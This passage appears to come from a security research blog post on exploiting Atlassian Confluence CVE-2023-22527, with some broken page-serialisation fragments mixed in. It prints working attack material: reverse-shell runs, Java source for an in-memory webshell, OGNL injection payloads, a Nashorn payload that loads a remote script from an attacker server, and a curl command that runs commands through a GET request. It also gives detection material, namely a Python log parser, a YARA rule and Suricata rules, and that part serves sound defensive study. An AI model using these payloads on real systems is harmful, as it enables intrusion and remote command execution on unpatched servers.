That will cause the class’s constructor to be executed.",[18,74472,10402,74473,74476],{},[47,74474,2485],{"href":74310,"rel":74475},[51]," proof of concept puts that all together and establishes a reverse shell in memory.",[1354,74478,74480],{"className":31740,"code":74479,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fcve-2023-22527\u002Freverseshell$ sudo docker run -it --network=host cve-2023-22527 -a -v -e -rhost 10.9.49.97 -rport 8090 -lhost 10.9.49.82 -lport 1270 -ell SUCCESS -fll SUCCESS\ntime=2024-03-01T18:22:37.114Z level=SUCCESS msg=\"Target verification succeeded!\" host=10.9.49.97 port=8090 verified=true\ntime=2024-03-01T18:22:37.412Z level=SUCCESS msg=\"Caught new shell from 10.9.49.97:50109\"\nC:\\Program Files\\Atlassian\\Confluence>whoami\nnt authority\\network service\n\nC:\\Program Files\\Atlassian\\Confluence>\n",[886,74481,74482,74538,74582,74608,74633,74647,74651],{"__ignoreMap":219},[1373,74483,74484,74486,74488,74491,74493,74496,74499,74502,74505,74507,74509,74511,74514,74516,74518,74520,74523,74525,74528,74530,74533,74535],{"class":1375,"line":1376},[1373,74485,69770],{"class":2206},[1373,74487,17747],{"class":1391},[1373,74489,74490],{"class":1391}," docker",[1373,74492,67145],{"class":1391},[1373,74494,74495],{"class":2209}," -it",[1373,74497,74498],{"class":2209}," --network=host",[1373,74500,74501],{"class":1391}," cve-2023-22527",[1373,74503,74504],{"class":2209}," -a",[1373,74506,45584],{"class":2209},[1373,74508,38907],{"class":2209},[1373,74510,38910],{"class":2209},[1373,74512,74513],{"class":5467}," 10.9.49.97",[1373,74515,45568],{"class":2209},[1373,74517,71225],{"class":5467},[1373,74519,38916],{"class":2209},[1373,74521,74522],{"class":5467}," 10.9.49.82",[1373,74524,38922],{"class":2209},[1373,74526,74527],{"class":5467}," 1270",[1373,74529,67177],{"class":2209},[1373,74531,74532],{"class":1391}," SUCCESS",[1373,74534,67171],{"class":2209},[1373,74536,74537],{"class":1391}," 
SUCCESS\n",[1373,74539,74540,74542,74544,74547,74549,74551,74553,74555,74557,74559,74561,74563,74565,74567,74570,74572,74574,74576,74578,74580],{"class":1375,"line":220},[1373,74541,38930],{"class":4640},[1373,74543,5417],{"class":1397},[1373,74545,74546],{"class":1391},"2024-03-01T18:22:37.114Z",[1373,74548,38938],{"class":4640},[1373,74550,5417],{"class":1397},[1373,74552,39062],{"class":1391},[1373,74554,38946],{"class":4640},[1373,74556,5417],{"class":1397},[1373,74558,183],{"class":1387},[1373,74560,45779],{"class":1391},[1373,74562,183],{"class":1387},[1373,74564,38991],{"class":4640},[1373,74566,5417],{"class":1397},[1373,74568,74569],{"class":1391},"10.9.49.97",[1373,74571,38999],{"class":4640},[1373,74573,5417],{"class":1397},[1373,74575,71171],{"class":1391},[1373,74577,45796],{"class":4640},[1373,74579,5417],{"class":1397},[1373,74581,45801],{"class":1391},[1373,74583,74584,74586,74588,74591,74593,74595,74597,74599,74601,74603,74606],{"class":1375,"line":1266},[1373,74585,38930],{"class":4640},[1373,74587,5417],{"class":1397},[1373,74589,74590],{"class":1391},"2024-03-01T18:22:37.412Z",[1373,74592,38938],{"class":4640},[1373,74594,5417],{"class":1397},[1373,74596,39062],{"class":1391},[1373,74598,38946],{"class":4640},[1373,74600,5417],{"class":1397},[1373,74602,183],{"class":1387},[1373,74604,74605],{"class":1391},"Caught new shell from 
10.9.49.97:50109",[1373,74607,19057],{"class":1387},[1373,74609,74610,74612,74614,74617,74620,74623,74626,74629,74631],{"class":1375,"line":1852},[1373,74611,46347],{"class":2206},[1373,74613,46350],{"class":1391},[1373,74615,74616],{"class":2326},"\\A",[1373,74618,74619],{"class":1391},"tlassian",[1373,74621,74622],{"class":2326},"\\C",[1373,74624,74625],{"class":1391},"onfluenc",[1373,74627,74628],{"class":4640},"e",[1373,74630,5384],{"class":1397},[1373,74632,35556],{"class":1391},[1373,74634,74635,74637,74639,74641,74644],{"class":1375,"line":4692},[1373,74636,46421],{"class":2206},[1373,74638,46424],{"class":1391},[1373,74640,8943],{"class":2326},[1373,74642,74643],{"class":1391},"etwork",[1373,74645,74646],{"class":1391}," service\n",[1373,74648,74649],{"class":1375,"line":4724},[1373,74650,6520],{"emptyLinePlaceholder":237},[1373,74652,74653,74655,74657,74659,74661,74663,74665,74667],{"class":1375,"line":4756},[1373,74654,46347],{"class":2206},[1373,74656,46350],{"class":1391},[1373,74658,74616],{"class":2326},[1373,74660,74619],{"class":1391},[1373,74662,74622],{"class":2326},[1373,74664,74625],{"class":1391},[1373,74666,74628],{"class":4640},[1373,74668,6765],{"class":1397},[18,74670,74671,74672,74674,74675,74677,74678,74683,74684,74686],{},"Above, the reader can see we establish a ",[886,74673,14509],{}," shell and execute ",[886,74676,22876],{}," just like all the ",[47,74679,74682],{"href":74680,"rel":74681},"https:\u002F\u002Fgist.github.com\u002FMSAdministrator\u002F7a61025263e279a740835da4b205e6d0#technique-commands-143",[51],"other APT",". 
Viewed from procmon, we can see the Confluence Tomcat server spin out `cmd.exe` subprocesses.

![Tomcat spinning out cmd.exe in procmon](/blog/confluence-dreams-of-shells/confluence-procmon-cmd.png)

Java or Tomcat spinning out shells is a well-known issue for Confluence, and our friends at SigmaHQ already have a Sigma rule that detects this behavior for CVE-2023-22518 (see: [SigmaHQ GitHub](https://github.com/SigmaHQ/sigma/blob/46559388e054e1aff3d7b3d8f41ebead2b690b21/rules-emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml#L29)). That rule keys on Tomcat spawning a shell, not on anything specific to CVE-2023-22518, so it applies to this exploit just as well.

But that isn't the only thing that makes class loading a tight reverse shell a bad idea for an attacker. Our implementation holds open the HTTP connection, so the request thread never returns. Once it has been busy for longer than the valve's threshold (60 seconds here), Tomcat's `StuckThreadDetectionValve` writes a warning, complete with a stack trace, to Confluence's `stderr` log file:

```text
01-Mar-2024 13:36:56.128 WARNING [Catalina-utility-1] org.apache.catalina.valves.StuckThreadDetectionValve.notifyStuckThreadDetected Thread [http-nio-8090-exec-4 url: /template/aui/text-inline.vm] (id=[272]) has been active for [67,521] milliseconds (since [3/1/24, 1:35 PM]) to serve the same request for [http://10.9.49.97:8090/template/aui/text-inline.vm] and may be stuck (configured threshold for this StuckThreadDetectionValve is [60] seconds). There is/are [2] thread(s) in total that are monitored by this Valve and may be stuck.
    java.lang.Throwable
     at java.base@17.0.8.1/sun.nio.ch.SocketDispatcher.read0(Native Method)
     at java.base@17.0.8.1/sun.nio.ch.SocketDispatcher.read(Unknown Source)
     at java.base@17.0.8.1/sun.nio.ch.NioSocketImpl.tryRead(Unknown Source)
     at java.base@17.0.8.1/sun.nio.ch.NioSocketImpl.implRead(Unknown Source)
     at java.base@17.0.8.1/sun.nio.ch.NioSocketImpl.read(Unknown Source)
     at java.base@17.0.8.1/sun.nio.ch.NioSocketImpl$1.read(Unknown Source)
     at java.base@17.0.8.1/java.net.Socket$SocketInputStream.read(Unknown Source)
     at java.base@17.0.8.1/sun.nio.cs.StreamDecoder.readBytes(Unknown Source)
     at java.base@17.0.8.1/sun.nio.cs.StreamDecoder.implRead(Unknown Source)
     at java.base@17.0.8.1/sun.nio.cs.StreamDecoder.read(Unknown Source)
     at java.base@17.0.8.1/java.io.InputStreamReader.read(Unknown Source)
     at java.base@17.0.8.1/java.io.BufferedReader.fill(Unknown Source)
     at java.base@17.0.8.1/java.io.BufferedReader.readLine(Unknown Source)
     at java.base@17.0.8.1/java.io.BufferedReader.readLine(Unknown Source)
     at QfOToRTqlN.<init>(ABCDEFG.java:31)
     at java.base@17.0.8.1/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
     at java.base@17.0.8.1/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(Unknown Source)
     at java.base@17.0.8.1/jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(Unknown Source)
     at java.base@17.0.8.1/java.lang.reflect.Constructor.newInstanceWithCaller(Unknown Source)
     at java.base@17.0.8.1/java.lang.reflect.ReflectAccess.newInstance(Unknown Source)
     at java.base@17.0.8.1/jdk.internal.reflect.ReflectionFactory.newInstance(Unknown Source)
     at java.base@17.0.8.1/java.lang.Class.newInstance(Unknown Source)
     at java.base@17.0.8.1/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
     at java.base@17.0.8.1/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
     at java.base@17.0.8.1/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
     at java.base@17.0.8.1/java.lang.reflect.Method.invoke(Unknown Source)
     at ognl.OgnlRuntime.invokeMethodInsideSandbox(OgnlRuntime.java:1266)
     at ognl.OgnlRuntime.invokeMethod(OgnlRuntime.java:1251)
     at ognl.OgnlRuntime.callAppropriateMethod(OgnlRuntime.java:1969)
     at ognl.ObjectMethodAccessor.callMethod(ObjectMethodAccessor.java:68)
     at com.opensymphony.xwork2.ognl.accessor.XWorkMethodAccessor.callMethodWithDebugInfo(XWorkMethodAccessor.java:98)
     at com.opensymphony.xwork2.ognl.accessor.XWorkMethodAccessor.callMethod(XWorkMethodAccessor.java:90)
     at ognl.OgnlRuntime.callMethod(OgnlRuntime.java:2045)
     at ognl.ASTMethod.getValueBody(ASTMethod.java:97)
     at ognl.SimpleNode.evaluateGetValueBody(SimpleNode.java:212)
     at ognl.SimpleNode.getValue(SimpleNode.java:258)
     at ognl.ASTChain.getValueBody(ASTChain.java:141)
     at ognl.SimpleNode.evaluateGetValueBody(SimpleNode.java:212)
     at ognl.SimpleNode.getValue(SimpleNode.java:258)
     at ognl.Ognl.getValue(Ognl.java:537)
     at ognl.Ognl.getValue(Ognl.java:687)
     at ognl.Ognl.getValue(Ognl.java:662)
     at org.apache.struts2.views.jsp.ui.OgnlTool.findValue(OgnlTool.java:48)
```

This stacktrace gives perfect visibility into the exploitation path. Read it from the bottom up: `OgnlTool.findValue` evaluates the attacker's OGNL expression, the chain runs up through `java.lang.Class.newInstance` (the freshly defined class being instantiated), into that class's constructor (`QfOToRTqlN.<init>`, the randomized name the exploit gave our `ABCDEFG` payload), and tops off with the socket read that is blocking the thread.
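That bottom-up reading is also the basis for a log check. The following Python is an added example, not code from the original post or from the vulncheck-oss repository: it parses Tomcat's `StuckThreadDetectionValve` warning out of the `stderr` log and alerts only when the frames occur in the order the exploit produces (OGNL evaluation, then `Class.newInstance`, then a blocking socket read), rather than when they merely appear somewhere in the file. `SAMPLE_LOG` is constructed: a trimmed copy of the trace above plus a made-up benign stuck thread (a slow report servlet) that must not fire.

```python
"""Flag the CVE-2023-22527 in-memory reverse shell from Confluence's stderr log.

Added example, not code from the original post or the vulncheck-oss repo.
It parses Tomcat's StuckThreadDetectionValve warning and requires the frames
to appear in the order the exploit produces (outermost to innermost):
OGNL evaluation -> Class.newInstance -> a blocking socket read in the new
class's constructor. SAMPLE_LOG is constructed: a trimmed copy of the trace
shown in the post plus a benign stuck thread (a slow report) that must not fire.
"""
import re
from dataclasses import dataclass, field

STUCK_RE = re.compile(
    r"StuckThreadDetectionValve\.notifyStuckThreadDetected Thread "
    r"\[(?P<thread>http-nio-\d+-exec-\d+) url: (?P<url>\S+)\] \(id=\[\d+\]\) "
    r"has been active for \[(?P<ms>[\d,]+)\] milliseconds"
)
FRAME_RE = re.compile(r"^\s+at (?P<frame>\S+)\(")

# Required frames, outermost call first. Matching on order rather than mere
# presence keeps an unrelated OGNL evaluation or socket read from alerting.
EXPLOIT_CHAIN = (
    "org.apache.struts2.views.jsp.ui.OgnlTool.findValue",
    "ognl.OgnlRuntime.invokeMethod",
    "java.lang.Class.newInstance",
    "sun.nio.ch.SocketDispatcher.read0",
)


@dataclass
class StuckThread:
    thread: str
    url: str
    active_ms: int
    frames: list = field(default_factory=list)  # innermost first, as Tomcat logs them


def parse_stuck_threads(text):
    """Split a stderr log into StuckThreadDetectionValve entries with their stack frames."""
    entries, current = [], None
    for line in text.splitlines():
        m = STUCK_RE.search(line)
        if m:
            current = StuckThread(m["thread"], m["url"], int(m["ms"].replace(",", "")))
            entries.append(current)
            continue
        fm = FRAME_RE.match(line)
        if fm and current is not None:
            # Drop the "java.base@17.0.8.1/" module prefix so the JDK build doesn't matter.
            current.frames.append(fm["frame"].split("/")[-1])
        elif current is not None and line and not line[0].isspace():
            current = None  # any other (unindented) log line ends the stack trace
    return entries


def is_exploit_chain(entry):
    """True when every frame in EXPLOIT_CHAIN occurs, in order, outermost to innermost."""
    outer_to_inner = list(reversed(entry.frames))
    pos = 0
    for wanted in EXPLOIT_CHAIN:
        if wanted not in outer_to_inner[pos:]:
            return False
        pos = outer_to_inner.index(wanted, pos) + 1
    return True


def find_alerts(text):
    """Return the stuck-thread entries whose stack matches the exploit chain."""
    return [e for e in parse_stuck_threads(text) if is_exploit_chain(e)]


# Constructed sample log: the exploit trace (trimmed) followed by a benign stuck thread.
SAMPLE_LOG = """\
01-Mar-2024 13:36:56.128 WARNING [Catalina-utility-1] org.apache.catalina.valves.StuckThreadDetectionValve.notifyStuckThreadDetected Thread [http-nio-8090-exec-4 url: /template/aui/text-inline.vm] (id=[272]) has been active for [67,521] milliseconds (since [3/1/24, 1:35 PM]) to serve the same request for [http://10.9.49.97:8090/template/aui/text-inline.vm] and may be stuck (configured threshold for this StuckThreadDetectionValve is [60] seconds). There is/are [2] thread(s) in total that are monitored by this Valve and may be stuck.
    java.lang.Throwable
     at java.base@17.0.8.1/sun.nio.ch.SocketDispatcher.read0(Native Method)
     at java.base@17.0.8.1/java.io.BufferedReader.readLine(Unknown Source)
     at QfOToRTqlN.<init>(ABCDEFG.java:31)
     at java.base@17.0.8.1/java.lang.Class.newInstance(Unknown Source)
     at java.base@17.0.8.1/java.lang.reflect.Method.invoke(Unknown Source)
     at ognl.OgnlRuntime.invokeMethod(OgnlRuntime.java:1251)
     at com.opensymphony.xwork2.ognl.accessor.XWorkMethodAccessor.callMethod(XWorkMethodAccessor.java:90)
     at ognl.Ognl.getValue(Ognl.java:662)
     at org.apache.struts2.views.jsp.ui.OgnlTool.findValue(OgnlTool.java:48)
01-Mar-2024 13:40:01.000 WARNING [Catalina-utility-1] org.apache.catalina.valves.StuckThreadDetectionValve.notifyStuckThreadDetected Thread [http-nio-8090-exec-7 url: /plugins/servlet/report] (id=[301]) has been active for [61,002] milliseconds (since [3/1/24, 1:39 PM]) to serve the same request for [http://10.9.49.97:8090/plugins/servlet/report] and may be stuck (configured threshold for this StuckThreadDetectionValve is [60] seconds). There is/are [2] thread(s) in total that are monitored by this Valve and may be stuck.
    java.lang.Throwable
     at java.base@17.0.8.1/java.net.SocketInputStream.read(Unknown Source)
     at org.postgresql.core.VisibleBufferedInputStream.readMore(VisibleBufferedInputStream.java:161)
     at org.postgresql.jdbc.PgStatement.executeQuery(PgStatement.java:242)
     at com.example.reports.SlowReportServlet.doGet(SlowReportServlet.java:40)
"""

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_LOG):
        print(f"{alert.thread} stuck {alert.active_ms} ms on {alert.url}: exploit chain")
```

Run it against `confluence*-stderr.*.log` (read the whole file, not line by line, since the stack trace spans many lines). The ordered check is the point: a long-running OGNL evaluation alone, or a thread blocked on a socket alone, is normal Confluence behaviour; a socket read sitting inside the constructor of a class that `Class.newInstance` created from an OGNL expression is not.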
A very simple YARA rule to detect this in the Confluence `stderr` file follows:

```yara
rule Confluence_CVE_2023_22527_Exploit
{
    meta:
      description = "Atlassian Confluence CVE-2023-22527 Exploit Attempt (In Memory Reverse Shell)"
      path_pattern = "C:\\Program Files\\Atlassian\\Confluence\\logs\\confluence[0-9]+-stderr.yyyy-mm-dd.log"

    strings:
      $stuck = /StuckThreadDetectionValve.notifyStuckThreadDetected Thread \[http-nio-\d+-exec-\d+ url: \/template\/aui\/text-inline.vm/
      $find = "org.apache.struts2.views.jsp.ui.OgnlTool.findValue"
      $callMethod = "com.opensymphony.xwork2.ognl.accessor.XWorkMethodAccessor.callMethod"
      $invokeMethod = "ognl.OgnlRuntime.invokeMethod"
    condition:
      all of them
}
```

Note that `all of them` only requires each string to appear somewhere in the file, not in the same stack trace, so treat a hit as a prompt to read the surrounding entry rather than as proof on its own.

So, while the reverse shell is a viable option, it'll get caught by known Sigma rules and leave (as implemented) very obvious log traces. But we can load anything we want! Let's move on to something more stealthy: an in-memory webshell.

### Loading a Webshell

Loading the webshell builds on the previous example. Exploitation is almost the same (using `ReflectUtils.defineClass` to load a pre-defined byte string), but the Java payload is significantly different. To demonstrate this, we shared a second proof of concept that you can find [here](https://github.com/vulncheck-oss/cve-2023-22527/tree/main/webshell).

The biggest difference is the inclusion of `ABCDEFG.java`, a class that implements [ServletRequestListener](https://docs.oracle.com/javaee%2F7%2Fapi%2F%2F/javax/servlet/ServletRequestListener.html). It is compiled with `javac` and the resulting class bytes are embedded into the go-exploit (the ridiculous name ABCDEFG is overwritten with a random name generated by the exploit).

Being a `ServletRequestListener` allows the class to handle inbound HTTP requests via the [requestInitialized](https://docs.oracle.com/javaee%2F7%2Fapi%2F%2F/javax/servlet/ServletRequestListener.html#requestInitialized-javax.servlet.ServletRequestEvent-) method. But it isn't enough to implement `ServletRequestListener`: the class needs to register as an event listener. This is done in the class's constructor:

```java
public ABCDEFG(ServletContext context) {
    try {
        // ServletContext is Tomcat's ApplicationContextFacade; its private "context" field is
        // the ApplicationContext, whose private "context" field is the StandardContext.
        addListener(this, getFieldValue(getFieldValue(context, "context"), "context"));
    } catch (Throwable e) {
    }
}

private void addListener(Object listener, Object standardContext) throws Exception {
    // addApplicationEventListener is a Tomcat method, not part of the Servlet API, so it is
    // reached reflectively rather than through the ServletContext interface.
    Method addApplicationEventListenerMethod = standardContext.getClass().getDeclaredMethod("addApplicationEventListener", Object.class);
    addApplicationEventListenerMethod.setAccessible(true);
    addApplicationEventListenerMethod.invoke(standardContext, listener);
}
```

The constructor expects the caller to provide a [javax.servlet.ServletContext](https://docs.oracle.com/javaee/6/api/javax/servlet/ServletContext.html), from which it extracts the underlying Tomcat [StandardContext](https://tomcat.apache.org/tomcat-8.0-doc/api/org/apache/catalina/core/StandardContext.html) (two hops through private `context` fields, via the `getFieldValue` reflection helper) and invokes `addApplicationEventListener` to register for events. The `ServletContext` is sourced from the exploit's OGNL expression. See the full payload below (with class bytes removed):

```text
weZ=(@org.springframework.cglib.core.ReflectUtils@defineClass('AgzJWbvprnpCqo', @org.springframework.util.Base64Utils@decodeFromString('classbytes…'), @java.lang.Thread@currentThread().getContextClassLoader())).getDeclaredConstructors[0].newInstance( @org.apache.struts2.ServletActionContext@getRequest().getServletContext())& label=\u0027+#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet( \u0027ognl\u0027).findValue(#parameters.weZ,{})+\u0027
```

Instead of using `newInstance` like we did in the previous exploit, we've switched to `getDeclaredConstructors[0].newInstance` to pass the `ServletContext` parameter. That parameter is generated by extracting the context from `getRequest`. In the payload above, that looks like the following: `@org.apache.struts2.ServletActionContext@getRequest().getServletContext()`.

The result is that the class can then intercept any HTTP request to Confluence. `ABCDEFG.class` implements a very simple webshell that looks for a specific request parameter to intercept and execute (the exploit overwrites the parameter with a random value before implanting the webshell):

```java
@Override
public void requestInitialized(ServletRequestEvent sret) {
    try {
        ServletRequest request = sret.getServletRequest();
        String cmd = request.getParameter("AAAAAAAAAAAA");
        if (cmd != null) {
            // The listener only receives the request; the response is pulled out of
            // Tomcat's RequestFacade -> Request -> response via reflection.
            ServletResponse response = (ServletResponse)getFieldValue(getFieldValue(request, "request"), "response");
            PrintWriter printWriter = response.getWriter();
            Process p = Runtime.getRuntime().exec(cmd);
            OutputStream os = p.getOutputStream();
            InputStream in = p.getInputStream();
            DataInputStream dis = new DataInputStream(in);
            String disr = dis.readLine();
            while (disr != null) {
                printWriter.write(disr);
                disr = dis.readLine();
            }
            printWriter.flush();
            printWriter.close();
        }
    }
    catch (Exception e) {
    }
}
```

This is a pretty standard webshell, hardly different from the in-memory webshell described by the [JSP Webshell Cookbook](https://medium.com/@m01e/jsp-webshell-cookbook-part-3-f2a96f3b81ad). But, by virtue of only being in memory, it provides a strong foothold into the victim network: nothing is written to disk for file-based scanners to find (the flip side being that the implant does not survive a restart of the Confluence process). Consider the following example using our [go-exploit](https://github.com/vulncheck-oss/cve-2023-22527/tree/main/webshell) to insert the webshell.

```bash
albinolobster@mournland:~/cve-2023-22527/webshell$ ./build/cve-2023-22527_linux-arm64 -v -a -c -e -rhost 10.9.49.80 -ell SUCCESS -fll SUCCESS
time=2024-03-04T10:37:44.404-05:00 level=SUCCESS msg="Target verification succeeded!" host=10.9.49.80 port=8090 verified=true
time=2024-03-04T10:37:44.582-05:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.80 port=8090 vulnerable=yes
time=2024-03-04T10:37:44.892-05:00 level=SUCCESS msg="In memory webshell available using KUifNtvadjt param"
time=2024-03-04T10:37:44.892-05:00 level=SUCCESS msg="Example usage: curl -kv http://10.9.49.80:8090/?KUifNtvadjt=whoami"
```

As the exploit says, the webshell is now available at `http://10.9.49.80:8090/?KUifNtvadjt=whoami`. We can execute `whoami` using the following `curl` command (note the response).

```bash
albinolobster@mournland:~/cve-2023-22527/webshell$ curl http://10.9.49.80:8090/?KUifNtvadjt=whoami
nt authority\network service
```

The webshell, still not stealthy in executing attacker-provided commands, uses `Runtime.getRuntime().exec(cmd)`. That is enough to avoid `cmd.exe`, though (and therefore the previous Sigma rule): `exec` launches `whoami.exe` directly as a child of the Tomcat `java` process, with no intermediate shell. A rule that alerts on any unexpected child process of Tomcat, rather than only on shells, would still catch it.

![Tomcat spinning out whoami.exe in procmon](/blog/confluence-dreams-of-shells/confluence-procmon-whoami.png)

Remember, though, this is just a proof of concept. A real weaponized payload (e.g. Godzilla) won't be using `Runtime.getRuntime().exec(cmd)`: it will do everything possible to implement the entire attack flow in Java, inside the Confluence process. This is pretty tough for defenders because it doesn't leave any good Confluence logs. Perhaps the best you can do is analyze the access log for weird patterns. Our webshell leaves a pretty obvious access log signature (a random parameter followed by a command):

```text
04/Mar/2024:10:38:32 -0500 - http-nio-8090-exec-1 10.9.49.81 GET /?KuifNtvadjt=whoami HTTP/1.1 500 73ms 39 - curl/7.68.0
```

Note what stands out: a request for `/` carrying a single, never-before-seen parameter whose value is a command name, answered with a 500 rather than a normal page.

### Staying in Memory Using Nashorn

Earlier, the blog mentioned that we approached this problem with Nashorn initially. (Un)fortunately, Confluence [bundles](https://confluence.atlassian.com/doc/bundled-tomcat-and-java-versions-1005786018.html) Java 17 since 8.2.3. Nashorn was removed in Java 15, so exploitation using the JavaScript engine is becoming irrelevant for Confluence. However, there will forever be Java 8 installs, so exploitation with Nashorn in general will never be dead, and this tidbit might be of use to someone eventually.

Although this blog touches on using `applyExpressionMaxLength` to bypass the OGNL limit, we weren't aware of this technique originally. The go-exploit [Nashorn payload](https://github.com/vulncheck-oss/cve-2023-22527/tree/main/nashorn) is quite large, so we needed a workaround. Fortunately, Nashorn supports the [load](https://wiki.openjdk.org/display/Nashorn/Nashorn+extensions) extension. `load` fetches a remote script and executes it, so the OGNL expression only has to carry a one-line `eval('load("…")')` and the bulky payload is served from the attacker's HTTP server instead. The CVE-2023-22527 exploit looks like this:

```text
label==\u0027%2b#request\u005b\u0027.K%45Y_velocity.struts2.context\u0027 \u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,%7B%7D)%2b\u0027&x=( new javax.script.ScriptEngineManager().getEngineByName('js').eval('load("http://10.9.49.81:8080/UOymEWIpfhgs")'))
```

You can find the proof of concept on [GitHub](https://github.com/vulncheck-oss/cve-2023-22527/tree/main/nashorn). The exploit spins up its own HTTP server to serve the Nashorn payload. Example usage:

```bash
albinolobster@mournland:~/cve-2023-22527/nashorn$ sudo docker run -it --network=host nashorn -v -a -c -e -rhost 10.9.49.88 -lhost 10.9.49.81 -lport 1270 -httpAddr 10.9.49.81 -ell SUCCESS -fll SUCCESS
time=2024-03-04T16:10:38.002Z level=SUCCESS msg="Target verification succeeded!" host=10.9.49.88 port=8090 verified=true
time=2024-03-04T16:10:38.146Z level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.88 port=8090 vulnerable=yes
time=2024-03-04T16:10:40.503Z level=SUCCESS msg="Caught new shell from 10.9.49.88:41826"
id
uid=2002(confluence) gid=2002(confluence) groups=2002(confluence),0(root)
```

## Detection on the Wire

Perhaps the best place to catch exploitation of CVE-2023-22527 is on the wire. VulnCheck's Initial Access team likes to obfuscate payloads to make life more challenging for detection engineers. For example, the reverse shell payload is entirely URL encoded here:

![Lightly obfuscated exploit bypasses detections](/blog/confluence-dreams-of-shells/cve-2023-22527-wireshark.png)

This isn't that strong of an obfuscation, though. The two elements of exploitation are still there. There is an unobfuscated `label` parameter (not pictured; the parameter name itself was left unencoded) and `\u0027`, the OGNL escape for the single quote, in some representation (URL encoded as `%5Cu0027` here).
As such, the following rules should catch all CVE-2023-22527 exploitation attempts:",[1354,75998,76001],{"className":75999,"code":76000,"language":1359,"meta":219},[1357],"alert http any any -> any any ( \\\n  msg:\"VULNCHECK Confluence CVE-2023-22527 Exploit Attempt (POST Body)\"; \\\n  flow:established,to_server; \\\n  http.method; content:\"POST\"; \\\n  http.uri; content:\"\u002Ftemplate\u002Faui\u002Ftext-inline.vm\"; startswith; \\\n  http.request_body; content:\"label=\"; \\\n  pcre:\"\u002Flabel=[^&]*(\\\\|%5c)(u|%75)|(0|%30)(0|%30)(2|%32)(7|%37)\u002Fi\"; \\\n  reference:cve,CVE-2023-22527; \\\n  classtype:web-application-attack; \\\n  sid:12700246; rev:2;)\n\nalert http any any -> any any ( \\\n  msg:\"VULNCHECK Confluence CVE-2023-22527 Exploit Attempt (POST URI)\"; \\\n  flow:established,to_server; \\\n  http.method; content:\"POST\"; \\\n  http.uri; content:\"\u002Ftemplate\u002Faui\u002Ftext-inline.vm\"; startswith; \\\n  content:\"label=\"; distance: 0; \\\n  pcre:\"\u002Flabel=[^&]*(\\\\|%5c)(u|%75)|(0|%30)(0|%30)(2|%32)(7|%37)\u002Fi\"; \\\n  reference:cve,CVE-2023-22527; \\\n  classtype:web-application-attack; \\\n  sid:12700258; rev:1;)\n\nalert http any any -> any any ( \\\n  msg:\"VULNCHECK Confluence CVE-2023-22527 Exploit Attempt (GET)\"; \\\n  flow:established,to_server; \\\n  http.method; content:\"GET\"; \\\n  http.uri; content:\"\u002Ftemplate\u002Faui\u002Ftext-inline.vm\"; startswith; \\\n  content:\"label=\"; distance: 0; \\\n  pcre:\"\u002Flabel=[^&]*(\\\\|%5c)(u|%75)|(0|%30)(0|%30)(2|%32)(7|%37)\u002Fi\"; \\\n  reference:cve,CVE-2023-22527; \\\n  classtype:web-application-attack; \\\n  sid:12700259; rev:1;)\n",[886,76002,76000],{"__ignoreMap":219},[18,76004,76005],{},"Perhaps surprising is that we have three rules for this vulnerability. 
It turns out, though, that the exploit can be thrown using HTTP GET:",[1354,76007,76009],{"className":31740,"code":76008,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -kvs -G -o \u002Fdev\u002Fnull http:\u002F\u002F10.9.49.76:8090\u002Ftemplate\u002Faui\u002Ftext-inline.vm \\\n> --data-urlencode 'label=\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.p1,{})+\\u0027' \\\n> --data-urlencode 'p1=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\"Cmd-Ret\",(new freemarker.template.utility.Execute()).exec({\"whoami\"}))'\n*   Trying 10.9.49.76:8090...\n* TCP_NODELAY set\n* Connected to 10.9.49.76 (10.9.49.76) port 8090 (#0)\n> GET \u002Ftemplate\u002Faui\u002Ftext-inline.vm?label=%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.p1%2C%7B%7D%29%2B%5Cu0027&p1=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%22Cmd-Ret%22%2C%28new%20freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29 HTTP\u002F1.1\n> Host: 10.9.49.76:8090\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n>\n* Mark bundle as not supporting multiuse\n\u003C HTTP\u002F1.1 200\n\u003C Cache-Control: no-store\n\u003C Expires: Thu, 01 Jan 1970 00:00:00 GMT\n\u003C X-XSS-Protection: 1; mode=block\n\u003C X-Content-Type-Options: nosniff\n\u003C X-Frame-Options: SAMEORIGIN\n\u003C Content-Security-Policy: frame-ancestors 'self'\n\u003C X-Confluence-Request-Time: 1709669510258\n\u003C Set-Cookie: JSESSIONID=4CABC119C5C70CC2C745D4107663F45C; Path=\u002F; HttpOnly\n\u003C Cmd-Ret: nt authority\\network service  \n\u003C X-Accel-Buffering: no\n\u003C Content-Type: text\u002Fhtml;charset=UTF-8\n\u003C Content-Language: en-US\n\u003C Transfer-Encoding: chunked\n\u003C Date: Tue, 05 Mar 2024 20:11:50 GMT\n\u003C\n{ [7656 bytes data]\n* Connection #0 to host 10.9.49.76 
